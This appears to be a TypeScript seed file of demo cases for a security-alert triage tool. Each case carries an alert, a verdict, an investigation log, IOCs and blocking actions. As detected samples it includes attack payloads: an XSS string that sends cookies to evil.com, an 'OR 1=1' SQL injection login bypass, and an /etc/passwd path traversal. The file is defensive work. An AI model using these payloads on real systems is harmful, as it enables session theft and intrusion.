import { store } from "./db";

const SEED_DATA = [
  {
    source: "gmail",
    alertType: "phishing_email",
    severity: 9,
    verdict: "MALICIOUS",
    confidence: 94,
    summary: "Spoofed Microsoft domain (micr0soft-verify.com) registered 2 days ago. SPF and DKIM both FAIL. Contains credential harvesting URL flagged by 12/90 VirusTotal vendors including Kaspersky and CrowdStrike.",
    rawData: JSON.stringify({ sender: "security@micr0soft-verify.com", subject: "URGENT: Verify your Microsoft account", body: "Click here to verify: http://micr0soft-verify.com/login", spf: "fail", dkim: "fail" }),
    investigationLog: JSON.stringify([
      { step: 1, reasoning: "Email from unusual domain, checking WHOIS...", tool: "check_whois", input: "micr0soft-verify.com", result: "Registered 2 days ago. Anonymous registrar." },
      { step: 2, reasoning: "Brand new domain impersonating Microsoft. Checking URL...", tool: "check_virustotal", input: "http://micr0soft-verify.com/login", result: "12/90 detections. Kaspersky: phishing." },
      { step: 3, reasoning: "Confirmed malicious. Checking for prior activity...", tool: "search_past_cases", input: "micr0soft-verify.com", result: "Found 1 related case: same IP range in SQLi attempts." },
      { step: 4, reasoning: "Repeat attacker. Blocking domain.", tool: "block_ioc", input: "domain: micr0soft-verify.com", result: "Domain blocked." },
    ]),
    actionsTaken: JSON.stringify([{ action: "block_domain", target: "micr0soft-verify.com" }, { action: "quarantine_email", target: "msg_abc123" }, { action: "send_alert", target: "SOC team notified" }]),
    mitreTechniques: "T1566.002,T1078",
    iocs: [
      { type: "domain", value: "micr0soft-verify.com", enrichmentData: JSON.stringify({ virustotal: { detections: "12/90" }, whois: { domain_age_days: 2 } }) },
      { type: "url", value: "http://micr0soft-verify.com/login" },
      { type: "email", value: "security@micr0soft-verify.com" },
    ],
    actions: [
      { actionType: "block_domain", target: "micr0soft-verify.com" },
      { actionType: "quarantine_email", target: "msg_abc123" },
      { actionType: "send_alert", target: "SOC team" },
    ],
  },
  {
    source: "render_server",
    alertType: "sql_injection",
    severity: 7,
    verdict: "MALICIOUS",
    confidence: 88,
    summary: "SQL injection attempt on /login endpoint from IP 185.220.101.42. Payload: admin' OR 1=1 --. IP has 847 abuse reports on AbuseIPDB with 95% confidence score. Located in Russia.",
    rawData: JSON.stringify({ ip: "185.220.101.42", method: "POST", url: "/login", body: { username: "admin' OR 1=1 --", password: "x" }, user_agent: "sqlmap/1.5" }),
    investigationLog: JSON.stringify([
      { step: 1, reasoning: "SQL injection detected. Checking source IP...", tool: "check_abuseipdb", input: "185.220.101.42", result: "847 reports, 95% confidence, Russia" },
      { step: 2, reasoning: "Known malicious IP. Checking VirusTotal...", tool: "check_virustotal", input: "185.220.101.42", result: "5/90 detections" },
      { step: 3, reasoning: "Blocking IP.", tool: "block_ioc", input: "ip: 185.220.101.42", result: "IP blocked." },
    ]),
    actionsTaken: JSON.stringify([{ action: "block_ip", target: "185.220.101.42" }]),
    mitreTechniques: "T1190",
    iocs: [{ type: "ip", value: "185.220.101.42", enrichmentData: JSON.stringify({ abuseipdb: { score: 95, reports: 847 } }) }],
    actions: [{ actionType: "block_ip", target: "185.220.101.42" }],
  },
  {
    source: "render_server",
    alertType: "brute_force",
    severity: 6,
    verdict: "MALICIOUS",
    confidence: 82,
    summary: "230 failed login attempts from IP 91.240.118.73 in 4 minutes targeting /login with username admin. IP is a known credential stuffing source from China.",
    rawData: JSON.stringify({ ip: "91.240.118.73", method: "POST", url: "/login", attempts: 230, duration_seconds: 240 }),
    investigationLog: JSON.stringify([
      { step: 1, reasoning: "230 login attempts in 4 minutes. Checking IP...", tool: "check_abuseipdb", input: "91.240.118.73", result: "312 reports, 78% confidence, China" },
      { step: 2, reasoning: "Known attacker. Blocking.", tool: "block_ioc", input: "ip: 91.240.118.73", result: "IP blocked." },
    ]),
    actionsTaken: JSON.stringify([{ action: "block_ip", target: "91.240.118.73" }]),
    mitreTechniques: "T1110.001",
    iocs: [{ type: "ip", value: "91.240.118.73" }],
    actions: [{ actionType: "block_ip", target: "91.240.118.73" }],
  },
  {
    source: "render_server",
    alertType: "xss",
    severity: 5,
    verdict: "MALICIOUS",
    confidence: 76,
    summary: "Cross-site scripting attempt via search parameter. Attacker tried to inject cookie-stealing JavaScript. Source IP has moderate abuse history.",
    rawData: JSON.stringify({ ip: "45.33.32.156", method: "GET", url: "/search?q=<script>document.location='http://evil.com/steal?c='+document.cookie</script>" }),
    investigationLog: JSON.stringify([
      { step: 1, reasoning: "XSS payload detected. Checking exfiltration domain...", tool: "check_virustotal", input: "evil.com", result: "23/90 detections. Known malicious." },
      { step: 2, reasoning: "Confirmed malicious.", tool: "check_abuseipdb", input: "45.33.32.156", result: "45 reports, 52% confidence." },
    ]),
    actionsTaken: JSON.stringify([{ action: "block_domain", target: "evil.com" }]),
    mitreTechniques: "T1190,T1059.007",
    iocs: [{ type: "ip", value: "45.33.32.156" }, { type: "domain", value: "evil.com" }],
    actions: [{ actionType: "block_domain", target: "evil.com" }],
  },
  {
    source: "render_server",
    alertType: "path_traversal",
    severity: 7,
    verdict: "MALICIOUS",
    confidence: 91,
    summary: "Path traversal attempt targeting /etc/passwd and .env files from IP 103.45.67.89. IP has high abuse score (89%). VPN exit node in Singapore.",
    rawData: JSON.stringify({ ip: "103.45.67.89", method: "GET", url: "/../../../etc/passwd" }),
    investigationLog: JSON.stringify([
      { step: 1, reasoning: "Path traversal detected. Checking IP...", tool: "check_abuseipdb", input: "103.45.67.89", result: "189 reports, 89% confidence, Singapore" },
      { step: 2, reasoning: "High-risk IP. Blocking.", tool: "block_ioc", input: "ip: 103.45.67.89", result: "IP blocked." },
    ]),
    actionsTaken: JSON.stringify([{ action: "block_ip", target: "103.45.67.89" }]),
    mitreTechniques: "T1083",
    iocs: [{ type: "ip", value: "103.45.67.89" }],
    actions: [{ actionType: "block_ip", target: "103.45.67.89" }],
  },
  {
    source: "render_server",
    alertType: "credential_stuffing",
    severity: 8,
    verdict: "MALICIOUS",
    confidence: 87,
    summary: "Credential stuffing attack. 450 unique username/password combinations from IP 77.88.21.100 in 8 minutes. Residential proxy from Ukraine.",
    rawData: JSON.stringify({ ip: "77.88.21.100", method: "POST", url: "/login", attempts: 450 }),
    investigationLog: JSON.stringify([
      { step: 1, reasoning: "450 unique credential pairs. Checking IP...", tool: "check_abuseipdb", input: "77.88.21.100", result: "567 reports, 92% confidence, Ukraine" },
      { step: 2, reasoning: "Active credential stuffing.", tool: "block_ioc", input: "ip: 77.88.21.100", result: "IP blocked." },
      { step: 3, tool: "send_alert", input: "critical: Credential stuffing blocked", result: "Alert sent." },
    ]),
    actionsTaken: JSON.stringify([{ action: "block_ip", target: "77.88.21.100" }, { action: "send_alert", target: "SOC team" }]),
    mitreTechniques: "T1110.004",
    iocs: [{ type: "ip", value: "77.88.21.100" }],
    actions: [{ actionType: "block_ip", target: "77.88.21.100" }, { actionType: "send_alert", target: "SOC team" }],
  },
  {
    source: "gmail",
    alertType: "correlated_multi_vector",
    severity: 10,
    verdict: "MALICIOUS",
    confidence: 98,
    summary: "CORRELATED THREAT: Phishing email from evil-corp.net (1 day old) + SQL injection + path traversal from same IP 185.220.101.42. Coordinated targeted attack from single threat actor.",
    rawData: JSON.stringify({ email: { sender: "admin@evil-corp.net", subject: "Verify your account" }, server_attacks: [{ ip: "185.220.101.42", type: "sql_injection" }], correlation: "evil-corp.net resolves to 185.220.101.42" }),
    investigationLog: JSON.stringify([
      { step: 1, reasoning: "Checking sender domain...", tool: "check_whois", input: "evil-corp.net", result: "Registered 1 day ago. Anonymous." },
      { step: 2, reasoning: "Checking URL...", tool: "check_virustotal", input: "http://evil-corp.net/portal/verify", result: "18/90 detections. Phishing." },
      { step: 3, reasoning: "Checking for prior activity...", tool: "search_past_cases", input: "185.220.101.42", result: "MATCH: Same IP in SQLi and path traversal cases today." },
      { step: 4, reasoning: "CRITICAL: Same infrastructure behind email AND server attacks.", tool: "check_abuseipdb", input: "185.220.101.42", result: "847 reports, 95% confidence, Russia" },
      { step: 5, reasoning: "Blocking all infrastructure.", tool: "block_ioc", input: "domain: evil-corp.net", result: "Blocked." },
      { step: 6, tool: "block_ioc", input: "ip: 185.220.101.42", result: "Blocked." },
      { step: 7, tool: "send_alert", input: "CRITICAL: Coordinated multi-vector attack", result: "Alert sent." },
    ]),
    actionsTaken: JSON.stringify([{ action: "block_domain", target: "evil-corp.net" }, { action: "block_ip", target: "185.220.101.42" }, { action: "quarantine_email", target: "3 emails" }, { action: "send_alert", target: "CRITICAL" }]),
    mitreTechniques: "T1566.002,T1190,T1083",
    iocs: [
      { type: "domain", value: "evil-corp.net", enrichmentData: JSON.stringify({ whois: { domain_age_days: 1 }, virustotal: { detections: "18/90" } }) },
      { type: "ip", value: "185.220.101.42", enrichmentData: JSON.stringify({ abuseipdb: { score: 95, reports: 847 } }) },
      { type: "email", value: "admin@evil-corp.net" },
    ],
    actions: [
      { actionType: "block_domain", target: "evil-corp.net" },
      { actionType: "block_ip", target: "185.220.101.42" },
      { actionType: "quarantine_email", target: "3 emails" },
      { actionType: "send_alert", target: "CRITICAL — all channels" },
    ],
  },
  {
    source: "render_server",
    alertType: "honeypot_access",
    severity: 3,
    verdict: "SUSPICIOUS",
    confidence: 65,
    summary: "Bot crawler accessed /wp-admin, /wp-login.php, and /.env. Likely automated scanner. User-agent: Nikto/2.1.6.",
    rawData: JSON.stringify({ ip: "198.51.100.23", paths: ["/wp-admin", "/wp-login.php", "/.env"], user_agent: "Nikto/2.1.6" }),
    investigationLog: JSON.stringify([
      { step: 1, reasoning: "Honeypot paths + Nikto scanner. Checking IP...", tool: "check_abuseipdb", input: "198.51.100.23", result: "12 reports, 25% confidence. Research scanner." },
    ]),
    actionsTaken: "[]",
    mitreTechniques: "T1595.002",
    iocs: [{ type: "ip", value: "198.51.100.23" }],
    actions: [],
  },
  {
    source: "render_server",
    alertType: "malicious_scanner",
    severity: 4,
    verdict: "SUSPICIOUS",
    confidence: 72,
    summary: "Automated vulnerability scanner (sqlmap/1.5) probing multiple endpoints. DigitalOcean VPS. Active reconnaissance.",
    rawData: JSON.stringify({ ip: "159.65.34.12", user_agent: "sqlmap/1.5" }),
    investigationLog: JSON.stringify([
      { step: 1, reasoning: "sqlmap detected. Checking IP...", tool: "check_abuseipdb", input: "159.65.34.12", result: "23 reports, 35% confidence, DigitalOcean" },
      { step: 2, reasoning: "Low abuse score. Monitoring only." },
    ]),
    actionsTaken: "[]",
    mitreTechniques: "T1595.002",
    iocs: [{ type: "ip", value: "159.65.34.12" }],
    actions: [],
  },
  {
    source: "windows_logs",
    alertType: "failed_login",
    severity: 3,
    verdict: "SUSPICIOUS",
    confidence: 55,
    summary: "12 failed RDP login attempts for Administrator in 3 minutes from internal IP 192.168.1.45. Could be misconfigured service or lateral movement.",
    rawData: JSON.stringify({ event_id: 4625, account: "Administrator", source_ip: "192.168.1.45", attempts: 12 }),
    investigationLog: JSON.stringify([
      { step: 1, reasoning: "Multiple failed RDP logins. Checking history.", tool: "search_past_cases", input: "192.168.1.45", result: "No previous cases." },
      { step: 2, reasoning: "First occurrence. Monitoring." },
    ]),
    actionsTaken: "[]",
    mitreTechniques: "T1110.001",
    iocs: [{ type: "ip", value: "192.168.1.45" }],
    actions: [],
  },
  {
    source: "gmail",
    alertType: "email_analysis",
    severity: 1,
    verdict: "BENIGN",
    confidence: 96,
    summary: "Marketing newsletter from known sender (mailchimp.com). SPF PASS, DKIM PASS. Domain 15 years old. No malicious URLs. False positive.",
    rawData: JSON.stringify({ sender: "newsletter@mail.mailchimp.com", subject: "Your weekly digest", spf: "pass", dkim: "pass" }),
    investigationLog: JSON.stringify([
      { step: 1, reasoning: "Checking sender domain...", tool: "check_whois", input: "mailchimp.com", result: "Registered 2001. Well-known provider." },
      { step: 2, reasoning: "Established domain, SPF/DKIM pass. Benign." },
    ]),
    actionsTaken: "[]",
    mitreTechniques: "",
    status: "dismissed",
    iocs: [],
    actions: [],
  },
];

export function seedDemoData() {
  if (store.cases().length > 0) return; // Already seeded
  for (const data of SEED_DATA) {
    store.create(data);
  }
  console.log(`[AEGIS] Seeded ${SEED_DATA.length} demo cases`);
}
